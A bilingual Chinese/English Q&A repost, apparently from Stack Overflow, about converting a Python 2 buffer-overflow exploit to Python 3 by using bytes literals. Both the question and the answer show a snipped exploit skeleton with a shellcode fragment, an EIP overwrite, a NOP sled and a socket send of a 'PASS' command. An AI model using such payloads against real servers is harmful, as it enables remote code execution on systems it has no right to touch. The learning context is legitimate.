利用Python 3开发 [英] Exploit development in Python 3
问题描述
我意识到使用python 3进行漏洞利用开发并不像使用python 2那样直接。
I realised that exploit development with python 3 is not as straight forward as it is using python 2.
据我了解,这主要是由于套接字库以及添加的 byte
数据类型。
As I understand, this is mainly due to the socket library and the added byte
datatype.
例如,我不知道如何将以下代码转换为Python 3个代码:
For example, I could not figure out how to translate the following code into Python 3 code:
--- SNIP ---
shellcode = ""
shellcode += "\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
--- SNIP ---
offset = "A" * 2606
eip = "\x43\x62\x4b\x5f"
nop = "\x90" * 16
padding = "C"
buff = offset + eip + nop + shellcode + padding * (424 - 351 - 16)
--- SNIP ---
bytes_sent = sock.send("PASS {}\r\n".format(buff))
--- SNIP ---
我尝试了以下操作:
--- SNIP ---
shellcode = ""
shellcode += "\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
--- SNIP ---
offset = "A" * 2606
eip = "\x43\x62\x4b\x5f"
nop = "\x90" * 16
padding = "C"
buff = offset + eip + nop + shellcode + padding * (424 - 351 - 16)
--- SNIP ---
bytes_sent = sock.send("PASS {}".format(buff).encode("UTF-8"))
--- SNIP ---
问题是 \x90
在内存中变成 C2 90
,我花了几个小时才弄清楚问题来自我的代码。我还怀疑这也会改变shellcode。
The problem is that \x90
becomes C2 90
in memory, it tooks me hours to figure out that the issue came from my code. I also suspect that this could alter the shellcode as well.
我想学习在Python中执行此操作的正确方法
I would like to learn the proper way of doing this in Python
推荐答案
Python 2代码本质上建立了一个字节字符串。在Python 3中,'...'
字符串文字代替了Unicode字符串对象。
The Python 2 code essentially builds up a byte string. In Python 3, '...'
string literals build up a Unicode string object instead.
在Python 3中,则需要 bytes
个对象,您可以使用 b'...'
个字节字符串文字来创建这些对象:
In Python 3, you want bytes
objects instead, which you can creating by using b'...'
byte string literals:
# --- SNIP ---
shellcode = b""
shellcode += b"\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
# --- SNIP ---
offset = b"A" * 2606
eip = b"\x43\x62\x4b\x5f"
nop = b"\x90" * 16
padding = b"C"
buff = offset + eip + nop + shellcode + padding * (424 - 351 - 16)
# --- SNIP ---
bytes_sent = sock.send(b"PASS %s\r\n" % buff)
# --- SNIP ---
bytes
没有 .format()
方法,但是%
格式化操作仍然可用。
bytes
doesn't have a .format()
method, but the %
formatting operation is still available.
这篇关于利用Python 3开发的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!